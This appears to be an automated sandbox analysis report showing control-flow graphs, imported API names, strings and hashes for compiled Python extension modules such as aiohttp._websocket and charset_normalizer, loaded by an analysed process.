RtlLookupFunctionEntry 14443->14444 14445 7ff81ec83138 RtlVirtualUnwind 14444->14445 14446 7ff81ec8305f 14444->14446 14445->14444 14445->14446 14447 7ff81ec83000 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14446->14447 15011 7ff81ec51ff8 PyBool_FromLong 14448 7ff81dee7ea0 14449 7ff81dee7ed8 14448->14449 14450 7ff81dee7eea memmove 14448->14450 14541 7ff81dee8a20 14542 7ff81dee8a40 14541->14542 14543 7ff81dee8bbb 14541->14543 14544 7ff81dee8a66 memmove 14542->14544 14545 7ff81dee8a56 14542->14545 14452 7ff81eca7b7a 14453 7ff81eca7b92 PyErr_SetString 14452->14453 14454 7ff81eca7b7f 14452->14454 11166 7ff81ec61000 PyImport_ImportModule 11167 7ff81ec61016 11166->11167 11170 7ff81ec61039 11166->11170 11168 7ff81ec6101c _Py_Dealloc 11167->11168 11169 7ff81ec61025 PyCapsule_Import 11167->11169 11168->11169 11169->11170 15012 7ff81ec71000 PyEval_SaveThread UuidCreateSequential PyEval_RestoreThread 15013 7ff81ec7103e 15012->15013 15014 7ff81ec71057 _Py_BuildValue_SizeT 15012->15014 15013->15014 15016 7ff81ec7104b PyErr_SetFromWindowsErr 15013->15016 15015 7ff81ec7106f 15014->15015 15019 7ff81ec710e0 15015->15019 15016->15015 15020 7ff81ec710e9 15019->15020 15021 7ff81ec7107c 15020->15021 15022 7ff81ec71494 IsProcessorFeaturePresent 15020->15022 15023 7ff81ec714ac 15022->15023 15028 7ff81ec71568 RtlCaptureContext 15023->15028 15029 7ff81ec71582 RtlLookupFunctionEntry 15028->15029 15030 7ff81ec71598 RtlVirtualUnwind 15029->15030 15031 7ff81ec714bf 15029->15031 15030->15029 15030->15031 15032 7ff81ec71460 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15031->15032 14455 7ff81ec51faa __scrt_dllmain_exception_filter 14810 7ff81def0590 14811 7ff81def05eb 14810->14811 14815 7ff81def0913 14810->14815 14817 7ff81def0606 14811->14817 14820 7ff81dee2c70 14811->14820 14816 7ff81def088a memmove 14816->14815 14816->14817 14817->14815 14817->14816 14819 7ff81def07d9 memmove 14817->14819 14828 7ff81def0230 14817->14828 14834 7ff81deefe30 14817->14834 14845 7ff81def00e0 14817->14845 14819->14815 14819->14817 14821 7ff81dee2c8e 14820->14821 14827 7ff81dee2e1c 14820->14827 14822 7ff81dee2cc0 14821->14822 14823 7ff81dee2ca2 memmove 14821->14823 14824 7ff81dee2ceb memmove 14822->14824 14825 7ff81dee2d71 14822->14825 14823->14817 14824->14825 14826 7ff81dee2e05 memmove 14825->14826 14825->14827 14826->14827 14827->14817 14831 7ff81def027d 14828->14831 14829 7ff81def041b memmove 14830 7ff81def02c1 14829->14830 14832 7ff81df4ebe0 6 API calls 14830->14832 14831->14829 14831->14830 14833 7ff81def0446 14832->14833 14833->14817 14835 7ff81deefeb0 14834->14835 14836 7ff81deefeab 14834->14836 14849 7ff81deefcd0 14835->14849 14838 7ff81deeff33 14836->14838 14843 7ff81deeff7c 14836->14843 14854 7ff81deefa20 14838->14854 14840 7ff81deeff77 14841 7ff81df4ebe0 6 API calls 14840->14841 14842 7ff81def00bc 14841->14842 14842->14817 14843->14840 14844 7ff81deefa20 7 API calls 14843->14844 14844->14843 14846 7ff81def0112 14845->14846 14847 7ff81deee940 6 API calls 14846->14847 14848 7ff81def0127 14846->14848 14847->14848 14848->14817 14850 7ff81deefe0f 14849->14850 14852 7ff81deefd19 14849->14852 14850->14836 14851 7ff81deef4c0 memset memset 14851->14852 14852->14850 14852->14851 14853 7ff81deefcd0 2 API calls 14852->14853 14853->14852 14858 7ff81deefa56 14854->14858 14855 7ff81deefb8e 14861 7ff81deee940 14855->14861 14856 7ff81deefbb9 14860 7ff81deefa7d 14856->14860 14865 7ff81dee7ae0 14856->14865 14858->14855 14858->14856 14858->14860 14860->14840 14864 7ff81deee9d5 14861->14864 14862 7ff81df4ebe0 6 API calls 14863 7ff81deeeb21 14862->14863 14863->14860 14864->14862 14866 7ff81dee7afe 14865->14866 14867 7ff81dee7b0b memmove 14865->14867 14866->14860 14867->14860 15033 7ff81def2110 15034 7ff81def2138 15033->15034 15035 7ff81def1d90 7 API calls 15034->15035 15036 7ff81def23af 15035->15036 14868 7ff81ec524b4 14869 7ff81ec524cc PyErr_Occurred 14868->14869 14870 7ff81ec524db PyLong_FromSsize_t 14868->14870 14869->14870 14871 7ff81ec524d7 14869->14871 14870->14871 14456 7ff81df2fd60 14457 7ff81df2fd7b 14456->14457 14458 7ff81df2fe13 14456->14458 14459 7ff81df2fd80 EnterCriticalSection 14457->14459 14461 7ff81df2fdc0 SleepConditionVariableCS 14457->14461 14459->14457 14460 7ff81df2fdec LeaveCriticalSection 14459->14460 14460->14458 14460->14459 14461->14460 14461->14461 14872 7ff81ec510b0 PyErr_NewExceptionWithDoc 14873 7ff81ec510e4 PyModule_AddObjectRef 14872->14873 14874 7ff81ec5112c 14872->14874 14873->14874 14875 7ff81ec510fb PyType_FromModuleAndSpec 14873->14875 14875->14874 14876 7ff81ec51116 PyModule_AddType 14875->14876 14876->14874 14877 7ff81ec514b0 14878 7ff81ec514cc 14877->14878 14879 7ff81ec514d1 14877->14879 14881 7ff81ec5166c 14878->14881 14882 7ff81ec5168f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 14881->14882 14883 7ff81ec51703 14881->14883 14882->14883 14883->14879 14884 7ff81ec610b0 14885 7ff81ec610b9 14884->14885 14886 7ff81ec610c4 14885->14886 14887 7ff81ec61464 IsProcessorFeaturePresent 14885->14887 14888 7ff81ec6147c 14887->14888 14893 7ff81ec61538 RtlCaptureContext 14888->14893 14894 7ff81ec61552 RtlLookupFunctionEntry 14893->14894 14895 7ff81ec61568 RtlVirtualUnwind 14894->14895 14896 7ff81ec6148f 14894->14896 14895->14894 14895->14896 14897 7ff81ec61430 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14896->14897 14462 7ff81eca2faf 14463 7ff81eca2fe4 _PyDict_GetItem_KnownHash 14462->14463 14466 7ff81eca2fc3 14462->14466 14464 7ff81eca301e PyErr_Occurred 14463->14464 14463->14466 14464->14466 14465 7ff81eca335d 14468 7ff81eca3385 14465->14468 14469 7ff81eca337c _Py_Dealloc 14465->14469 14466->14465 14467 7ff81eca3354 _Py_Dealloc 14466->14467 14467->14465 14469->14468 14470 7ff81def0e89 memset 14471 7ff81def0eb4 14470->14471 14546 7ff81ec5251c PyObject_GC_UnTrack 14547 7ff81ec5253c 14546->14547 14548 7ff81ec52552 14546->14548 14549 7ff81ec52548 PyThread_free_lock 14547->14549 14550 7ff81ec52542 PyThread_release_lock 14547->14550 14557 7ff81ec524f0 14548->14557 14549->14548 14550->14549 14553 7ff81ec5256a 14555 7ff81ec5257d _Py_Dealloc 14553->14555 14556 7ff81ec52586 14553->14556 14554 7ff81ec52561 PyObject_ClearWeakRefs 14554->14553 14555->14556 14558 7ff81ec52514 14557->14558 14559 7ff81ec52500 14557->14559 14558->14553 14558->14554 14559->14558 14560 7ff81ec5250e _Py_Dealloc 14559->14560 14560->14558 15037 7ff81ec5201c 15038 7ff81ec52059 15037->15038 15039 7ff81ec52070 _PyArg_UnpackKeywords 15038->15039 15040 7ff81ec520b5 15038->15040 15039->15040 15044 7ff81ec520ec 15039->15044 15041 7ff81ec520ce 15040->15041 15042 7ff81ec520c2 PyObject_IsTrue 15040->15042 15045 7ff81ec5210c 15041->15045 15042->15041 15042->15044 15046 7ff81ec52139 15045->15046 15055 7ff81ec52132 15045->15055 15047 7ff81ec52146 _PyTime_FromSecondsObject 15046->15047 15046->15055 15048 7ff81ec5215e 15047->15048 15049 7ff81ec5217f 15047->15049 15052 7ff81ec52168 PyErr_SetString 15048->15052 15053 7ff81ec52186 _PyTime_AsMicroseconds 15048->15053 15049->15044 15050 7ff81ec521ea PyThread_acquire_lock_timed 15050->15055 15051 7ff81ec52283 15064 7ff81ec52720 15051->15064 15052->15049 15059 7ff81ec521c1 _PyDeadline_Init 15053->15059 15060 7ff81ec521a3 PyErr_SetString 15053->15060 15055->15050 15055->15051 15056 7ff81ec52208 PyEval_SaveThread PyThread_acquire_lock_timed PyEval_RestoreThread 15055->15056 15057 7ff81ec522c1 PyType_GetModule PyErr_SetNone 15055->15057 15058 7ff81ec52232 Py_MakePendingCalls 15055->15058 15063 7ff81ec52252 _PyDeadline_Get _PyTime_AsMicroseconds 15055->15063 15056->15055 15057->15049 15058->15049 15058->15055 15059->15055 15060->15049 15062 7ff81ec52294 PyThread_release_lock 15062->15049 15063->15055 15065 7ff81ec5228b 15064->15065 15066 7ff81ec52775 PyList_SetSlice 15064->15066 15065->15049 15065->15062 15066->15065 14472 7ff81ec9fba0 14473 7ff81ec9fbbc 14472->14473 14474 7ff81ec9fbde _Py_Dealloc 14473->14474 14475 7ff81ec9fbc4 14473->14475 14474->14475 14476 7ff81eca6ba0 PyTuple_Pack 14477 7ff81eca6bc9 PyTuple_Pack 14476->14477 14488 7ff81eca6dbd 14476->14488 14478 7ff81eca6beb PyTuple_Pack 14477->14478 14477->14488 14479 7ff81eca6c0d PyTuple_Pack 14478->14479 14478->14488 14480 7ff81eca6c2f PyTuple_Pack 14479->14480 14479->14488 14481 7ff81eca6c51 PyTuple_Pack 14480->14481 14480->14488 14482 7ff81eca6c73 PyTuple_Pack 14481->14482 14481->14488 14483 7ff81eca6ca3 PyTuple_Pack 14482->14483 14482->14488 14484 7ff81eca6cd3 PyTuple_Pack 14483->14484 14483->14488 14485 7ff81eca6d0f PyTuple_Pack 14484->14485 14484->14488 14486 7ff81eca6d57 14485->14486 14485->14488 14487 7ff81eca6d79 PyTuple_Pack 14486->14487 14486->14488 14487->14488 14489 7ff81ecb03a0 14490 7ff81ecb03d6 14489->14490 14491 7ff81ecb03c7 14489->14491 14493 7ff81ecb03e1 _Py_Dealloc 14490->14493 14495 7ff81ecb03ea 14490->14495 14491->14490 14492 7ff81ecb03cd _Py_Dealloc 14491->14492 14492->14490 14493->14495 14494 7ff81ecb03fe 14495->14494 14496 7ff81ecb03f5 _Py_Dealloc 14495->14496 14496->14494 14497 7ff81ecb07a0 14498 7ff81ecb07e5 14497->14498 14503 7ff81ecb07c9 14497->14503 14499 7ff81ecb0803 14498->14499 14500 7ff81ecb0808 PyObject_GetAttr 14498->14500 14501 7ff81ecb0816 PyErr_ExceptionMatches 14499->14501 14502 7ff81ecb083f _PyObject_CallFunction_SizeT 14499->14502 14500->14499 14505 7ff81ecb0833 PyErr_Clear 14501->14505 14506 7ff81ecb082a PyErr_WriteUnraisable 14501->14506 14502->14503 14507 7ff81ecb0853 _Py_Dealloc 14502->14507 14504 7ff81ecb07dd 14503->14504 14508 7ff81ecb0873 _Py_Dealloc 14503->14508 14505->14504 14506->14505 14507->14503 14508->14504 14561 7ff81ec52318 14562 7ff81ec5233f 14561->14562 14563 7ff81ec5235e _PyArg_UnpackKeywords 14562->14563 14564 7ff81ec523a3 14562->14564 14563->14564 14565 7ff81ec523c6 14563->14565 14566 7ff81ec523e7 14564->14566 14567 7ff81ec523bc PyObject_IsTrue 14564->14567 14571 7ff81ec51170 14565->14571 14580 7ff81ec523f8 PyList_Append 14566->14580 14567->14565 14567->14566 14572 7ff81ec51179 14571->14572 14573 7ff81ec51184 14572->14573 14574 7ff81ec51524 IsProcessorFeaturePresent 14572->14574 14575 7ff81ec5153c 14574->14575 14584 7ff81ec515f8 RtlCaptureContext 14575->14584 14581 7ff81ec5240f 14580->14581 14582 7ff81ec52413 14580->14582 14581->14565 14582->14581 14583 7ff81ec52419 PyThread_release_lock 14582->14583 14583->14581 14585 7ff81ec51612 RtlLookupFunctionEntry 14584->14585 14586 7ff81ec51628 RtlVirtualUnwind 14585->14586 14587 7ff81ec5154f 14585->14587 14586->14585 14586->14587 14588 7ff81ec514f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14587->14588 14898 7ff81dee2580 14899 7ff81dee25c0 9 API calls 14898->14899 14900 7ff81dee25ad 14899->14900 15067 7ff81dee7100 15068 7ff81dee711e 15067->15068 15071 7ff81dee7181 15067->15071 15069 7ff81dee7355 15071->15069 15072 7ff81dee5250 15071->15072 15073 7ff81dee52c2 15072->15073 15077 7ff81dee52b9 15072->15077 15074 7ff81dee52d6 memset 15073->15074 15073->15077 15074->15077 15075 7ff81df4ebe0 6 API calls 15076 7ff81dee542b 15075->15076 15076->15071 15077->15075 15077->15077 14901 7ff81dee9580 14902 7ff81dee95e4 14901->14902 14903 7ff81dee95f8 14901->14903 14904 7ff81dee9663 memmove 14903->14904 14905 7ff81dee9612 14903->14905 14904->14905 14509 7ff81ec96f9d 14510 7ff81ec96ff3 PyDict_Size 14509->14510 14511 7ff81ec97009 14510->14511

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$DeallocImportImport_Module$ClearUnraisableWarnWrite
                                                                                                                                                                                                                                          • String ID: Cython module failed to register with collections.abc module$backports_abc$collections.abc
                                                                                                                                                                                                                                          • API String ID: 3055409517-3167216013
                                                                                                                                                                                                                                          • Opcode ID: dba47703814b50345f0bfb40dbc3bdb52dd412e8dda9eaddcbaec9fe2cb75489
                                                                                                                                                                                                                                          • Instruction ID: 2c2ddac597505d59f8f3e83e47511694f51ac4316d8a56832fb2d874c7461a96
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dba47703814b50345f0bfb40dbc3bdb52dd412e8dda9eaddcbaec9fe2cb75489
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8011E620E29E0381EF559B62AC582B622D0AF84BF5F480334D90F463A0EE7DF7898710

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638693744.00007FF81EC61000.00000020.00000001.01000000.0000006F.sdmp, Offset: 00007FF81EC60000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638664892.00007FF81EC60000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638782154.00007FF81EC62000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638844829.00007FF81EC64000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec60000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Import$Capsule_DeallocImport_Module
                                                                                                                                                                                                                                          • String ID: charset_normalizer.md__mypyc$charset_normalizer.md__mypyc.init_charset_normalizer___md
                                                                                                                                                                                                                                          • API String ID: 1394619730-824592145
                                                                                                                                                                                                                                          • Opcode ID: 4dbea5a90385b545af12b2b3c19e32250d97452fe296dfd027e4427eacffc248
                                                                                                                                                                                                                                          • Instruction ID: bb5ff843827767d03a6d0ecb3e7bf2e99016e3bd5a1afb178811cd3d13c997cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dbea5a90385b545af12b2b3c19e32250d97452fe296dfd027e4427eacffc248
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1E01A25F2EE02C1EF1C9F22BC441B222E26FACBE1F884634C51D42354EE2CB9458310

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4374 7ff81ec81b90-7ff81ec81bb8 4375 7ff81ec81bba-7ff81ec81bbd 4374->4375 4376 7ff81ec81be7-7ff81ec81c3f Py_GetVersion PyOS_snprintf 4374->4376 4377 7ff81ec81bbf-7ff81ec81bc1 4375->4377 4378 7ff81ec81bc6-7ff81ec81be2 PyErr_SetString 4375->4378 4379 7ff81ec81c42-7ff81ec81c55 4376->4379 4380 7ff81ec82299-7ff81ec822b1 call 7ff81ec82c80 4377->4380 4378->4380 4381 7ff81ec81c8e-7ff81ec81c9b 4379->4381 4382 7ff81ec81c57-7ff81ec81c59 4379->4382 4384 7ff81ec81c9d-7ff81ec81cba 4381->4384 4386 7ff81ec81c6c-7ff81ec81c7e PyTuple_New 4381->4386 4382->4384 4385 7ff81ec81c5b-7ff81ec81c6a 4382->4385 4387 7ff81ec81cc0-7ff81ec81cd3 4384->4387 4385->4379 4385->4386 4389 7ff81ec81d4b-7ff81ec81d64 PyBytes_FromStringAndSize 4386->4389 4390 7ff81ec81c84-7ff81ec81c89 4386->4390 4391 7ff81ec81cdf-7ff81ec81ce4 4387->4391 4392 7ff81ec81cd5-7ff81ec81cd8 4387->4392 4393 7ff81ec81d66-7ff81ec81d6b 4389->4393 4394 7ff81ec81d70-7ff81ec81d89 PyUnicode_FromStringAndSize 4389->4394 4395 7ff81ec821fb 4390->4395 4397 7ff81ec81cf2-7ff81ec81d3b PyOS_snprintf PyErr_WarnEx 4391->4397 4398 7ff81ec81ce6-7ff81ec81cf0 4391->4398 4396 7ff81ec81cda-7ff81ec81cdd 4392->4396 4392->4397 4393->4395 4400 7ff81ec81d8b-7ff81ec81d90 4394->4400 4401 7ff81ec81d95-7ff81ec81db2 PyModule_GetDict 4394->4401 4399 7ff81ec82202-7ff81ec8220a 4395->4399 4396->4398 4397->4386 4402 7ff81ec81d41-7ff81ec81d46 4397->4402 4398->4387 4398->4397 4403 7ff81ec8224f-7ff81ec82258 PyErr_Occurred 4399->4403 4404 7ff81ec8220c-7ff81ec82214 4399->4404 4400->4395 4405 7ff81ec81dbe-7ff81ec81ddf PyImport_AddModule 4401->4405 4406 7ff81ec81db4-7ff81ec81db9 4401->4406 4402->4395 4407 7ff81ec8225a-7ff81ec8226b PyErr_SetString 4403->4407 4408 7ff81ec82271-7ff81ec82297 4403->4408 4409 7ff81ec8222a-7ff81ec82234 4404->4409 4410 7ff81ec82216-7ff81ec82225 call 7ff81ec82840 4404->4410 4411 7ff81ec81deb-7ff81ec81e05 PyImport_AddModule 4405->4411 4412 7ff81ec81de1-7ff81ec81de6 4405->4412 4406->4395 4407->4408 4408->4380 4409->4408 4416 7ff81ec82236-7ff81ec82245 4409->4416 4410->4409 4413 7ff81ec81e07-7ff81ec81e0c 4411->4413 4414 7ff81ec81e11-7ff81ec81e31 PyObject_SetAttrString 4411->4414 4412->4395 4413->4395 4417 7ff81ec81e3d-7ff81ec81e45 4414->4417 4418 7ff81ec81e33-7ff81ec81e38 4414->4418 4416->4408 4419 7ff81ec82247-7ff81ec8224d _Py_Dealloc 4416->4419 4420 7ff81ec81e4b 4417->4420 4421 7ff81ec81ec6-7ff81ec81ecd 4417->4421 4418->4395 4419->4408 4424 7ff81ec81e52-7ff81ec81e5c 4420->4424 4422 7ff81ec81ecf-7ff81ec81eec PyObject_SetAttr 4421->4422 4423 7ff81ec81f02-7ff81ec81f0e PyImport_GetModuleDict 4421->4423 4422->4423 4425 7ff81ec81eee-7ff81ec81ef3 4422->4425 4426 7ff81ec81f1a-7ff81ec81f29 PyDict_GetItemString 4423->4426 4427 7ff81ec81f10-7ff81ec81f15 4423->4427 4428 7ff81ec81e8f-7ff81ec81e96 PyBytes_FromStringAndSize 4424->4428 4429 7ff81ec81e5e-7ff81ec81e62 4424->4429 4425->4395 4430 7ff81ec81f4c-7ff81ec81f6b 4426->4430 4431 7ff81ec81f2b-7ff81ec81f40 PyDict_SetItemString 4426->4431 4427->4395 4434 7ff81ec81e9c-7ff81ec81ead 4428->4434 4432 7ff81ec81e6c-7ff81ec81e7a 4429->4432 4433 7ff81ec81e64-7ff81ec81e6a PyUnicode_InternFromString 4429->4433 4436 7ff81ec81f6d-7ff81ec81f70 4430->4436 4437 7ff81ec81f72 PyObject_GetAttr 4430->4437 4431->4430 4435 7ff81ec81f42-7ff81ec81f47 4431->4435 4438 7ff81ec81e7c-7ff81ec81e85 PyUnicode_Decode 4432->4438 4439 7ff81ec81e87-7ff81ec81e8d PyUnicode_FromStringAndSize 4432->4439 4433->4434 4440 7ff81ec81eaf-7ff81ec81eb9 PyObject_Hash 4434->4440 4441 7ff81ec81ef8-7ff81ec81efd 4434->4441 4435->4395 4442 7ff81ec81f78-7ff81ec81f7e 4436->4442 4437->4442 4438->4434 4439->4434 4440->4441 4443 7ff81ec81ebb-7ff81ec81ec4 4440->4443 4441->4395 4445 7ff81ec81fab-7ff81ec82018 PyTuple_Pack 4442->4445 4446 7ff81ec81f80-7ff81ec81fa6 PyErr_Format 4442->4446 4443->4421 4443->4424 4447 7ff81ec8201e-7ff81ec8202d call 7ff81ec81000 4445->4447 4448 7ff81ec821f6 4445->4448 4446->4395 4447->4448 4451 7ff81ec82033-7ff81ec82046 PyImport_ImportModule 4447->4451 4448->4395 4452 7ff81ec821ef-7ff81ec821f4 4451->4452 4453 7ff81ec8204c-7ff81ec8206b call 7ff81ec826a0 4451->4453 4452->4395 4456 7ff81ec821e1-7ff81ec821e4 4453->4456 4457 7ff81ec82071-7ff81ec82074 4453->4457 4456->4452 4458 7ff81ec821e6-7ff81ec821e9 _Py_Dealloc 4456->4458 4459 7ff81ec8207f-7ff81ec82092 PyImport_ImportModule 4457->4459 4460 7ff81ec82076-7ff81ec82079 _Py_Dealloc 4457->4460 4458->4452 4459->4452 4461 7ff81ec82098-7ff81ec820b7 call 7ff81ec826a0 4459->4461 4460->4459 4461->4456 4464 7ff81ec820bd-7ff81ec820c0 4461->4464 4465 7ff81ec820cb-7ff81ec820de PyImport_ImportModule 4464->4465 4466 7ff81ec820c2-7ff81ec820c5 _Py_Dealloc 4464->4466 4465->4452 4467 7ff81ec820e4-7ff81ec82103 call 7ff81ec826a0 4465->4467 4466->4465 4467->4456 4470 7ff81ec82109-7ff81ec8210c 4467->4470 4471 7ff81ec8210e-7ff81ec82111 _Py_Dealloc 4470->4471 4472 7ff81ec82117-7ff81ec82136 PyCMethod_New 4470->4472 4471->4472 4473 7ff81ec82138-7ff81ec82140 4472->4473 4474 7ff81ec82145-7ff81ec8215e PyDict_SetItem 4472->4474 4473->4395 4475 7ff81ec8216c-7ff81ec82170 4474->4475 4476 7ff81ec82160-7ff81ec8216a 4474->4476 4478 7ff81ec8217b-7ff81ec82187 PyDict_New 4475->4478 4479 7ff81ec82172-7ff81ec82175 _Py_Dealloc 4475->4479 4477 7ff81ec821b0-7ff81ec821bc 4476->4477 4477->4399 4480 7ff81ec821be-7ff81ec821c7 _Py_Dealloc 4477->4480 4481 7ff81ec82189-7ff81ec8218e 4478->4481 4482 7ff81ec82190-7ff81ec821a9 PyDict_SetItem 4478->4482 4479->4478 4480->4399 4481->4395 4483 7ff81ec821ab 4482->4483 4484 7ff81ec821c9-7ff81ec821cd 4482->4484 4483->4477 4484->4408 4485 7ff81ec821d3-7ff81ec821dc _Py_Dealloc 4484->4485 4485->4408
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_S_snprintfStringTuple_Version
                                                                                                                                                                                                                                          • String ID: %d.%d$Module '_websocket' has already been imported. Re-initialisation is not supported.$__builtins__$aiohttp._websocket$bool$builtins$compiletime version %s of module '%.100s' does not match runtime version %s$complex$cython_runtime$init aiohttp._websocket$name '%U' is not defined$type
                                                                                                                                                                                                                                          • API String ID: 2595704531-1331746022
                                                                                                                                                                                                                                          • Opcode ID: ec2dc984526bc0c0b4ed55793f2131a1063850b25dbdb0b78f73a93f2603d92c
                                                                                                                                                                                                                                          • Instruction ID: 09ed4e871203d2a27288c7eab381a4d90dc42941c109017a99993049811de819
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec2dc984526bc0c0b4ed55793f2131a1063850b25dbdb0b78f73a93f2603d92c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6121525A2DE4281FB658B11EE54AB963A1BF44BF4F55433AD98E477A0EF3CF9448300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4486 7ff81ec81000-7ff81ec810a1 PyErr_Fetch PyDict_New 4487 7ff81ec8142a-7ff81ec81435 4486->4487 4488 7ff81ec810a7-7ff81ec810bb PyLong_FromLong 4486->4488 4489 7ff81ec8144a-7ff81ec81469 4487->4489 4490 7ff81ec81437-7ff81ec81444 PyErr_Restore 4487->4490 4491 7ff81ec81368-7ff81ec8136c 4488->4491 4492 7ff81ec810c1-7ff81ec810d6 PyDict_SetItemString 4488->4492 4490->4489 4493 7ff81ec8136e-7ff81ec81371 _Py_Dealloc 4491->4493 4494 7ff81ec81377-7ff81ec81382 4491->4494 4492->4491 4495 7ff81ec810dc-7ff81ec810ef PyLong_FromLong 4492->4495 4493->4494 4496 7ff81ec81384-7ff81ec81388 4494->4496 4497 7ff81ec81393-7ff81ec8139e 4494->4497 4495->4491 4498 7ff81ec810f5-7ff81ec8110a PyDict_SetItemString 4495->4498 4496->4497 4499 7ff81ec8138a-7ff81ec8138d _Py_Dealloc 4496->4499 4501 7ff81ec813af-7ff81ec813b2 4497->4501 4502 7ff81ec813a0-7ff81ec813a4 4497->4502 4498->4491 4500 7ff81ec81110-7ff81ec8111e PyLong_FromLong 4498->4500 4499->4497 4500->4491 4503 7ff81ec81124-7ff81ec81139 PyDict_SetItemString 4500->4503 4505 7ff81ec813c4-7ff81ec813c7 4501->4505 4506 7ff81ec813b4-7ff81ec813b9 4501->4506 4502->4501 4504 7ff81ec813a6-7ff81ec813a9 _Py_Dealloc 4502->4504 4503->4491 4509 7ff81ec8113f-7ff81ec8114e PyLong_FromLong 4503->4509 4504->4501 4507 7ff81ec813d9-7ff81ec813dc 4505->4507 4508 7ff81ec813c9-7ff81ec813ce 4505->4508 4506->4505 4510 7ff81ec813bb-7ff81ec813be _Py_Dealloc 4506->4510 4512 7ff81ec813de-7ff81ec813e2 4507->4512 4513 7ff81ec813ed-7ff81ec813f0 4507->4513 4508->4507 4511 7ff81ec813d0-7ff81ec813d3 _Py_Dealloc 4508->4511 4509->4491 4514 7ff81ec81154-7ff81ec81169 PyDict_SetItemString 4509->4514 4510->4505 4511->4507 4512->4513 4515 7ff81ec813e4-7ff81ec813e7 _Py_Dealloc 4512->4515 4516 7ff81ec813f2-7ff81ec813f6 4513->4516 4517 7ff81ec81401-7ff81ec81404 4513->4517 4514->4491 4518 7ff81ec8116f-7ff81ec8117d PyLong_FromLong 4514->4518 4515->4513 4516->4517 4519 7ff81ec813f8-7ff81ec813fb _Py_Dealloc 4516->4519 4520 7ff81ec81406-7ff81ec8140a 4517->4520 4521 7ff81ec81415-7ff81ec81418 4517->4521 4518->4491 4522 7ff81ec81183-7ff81ec81198 PyDict_SetItemString 4518->4522 4519->4517 4520->4521 4524 7ff81ec8140c-7ff81ec8140f _Py_Dealloc 4520->4524 4521->4487 4525 7ff81ec8141a-7ff81ec8141f 4521->4525 4522->4491 4523 7ff81ec8119e-7ff81ec811aa PyLong_FromLong 4522->4523 4523->4491 4526 7ff81ec811b0-7ff81ec811c5 PyDict_SetItemString 4523->4526 4524->4521 4525->4487 4527 